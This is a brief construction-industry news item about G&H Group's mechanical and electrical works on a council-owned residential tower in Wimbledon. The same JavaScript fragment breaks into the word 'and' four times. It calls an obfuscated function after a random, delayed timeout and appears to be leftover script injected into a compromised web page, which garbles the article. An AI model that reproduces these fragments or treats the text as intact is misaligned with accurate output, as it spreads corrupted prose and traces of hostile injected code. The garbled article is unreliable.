The main contractor, JJ Rhatigan andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Company, appointed G&H Group last autumn as it redevelops the Merton Council-owned property in Wimbledon.
The project sees G&H Building Services designing, building andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and installing HVAC, power alarms, heat recovery ventilation andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and domestic appliances to 182 apartments over 18-storeys.
A central heating system will feed individual boiler interface units in each of the one andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and two-bed properties.
G&H Fabrication has manufactured two large, bespoke stainless steel risers off-site in its specialist welding facility andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and delivered to site at the precise time they were needed.
Senior Contracts Manager at G&H Building Services, Paul Cuss, said: “The tower will breathe new life into the area, transforming a rundown, unpopular building into modern looking apartments.

The M&E works are due to be completed at the end of the summer.
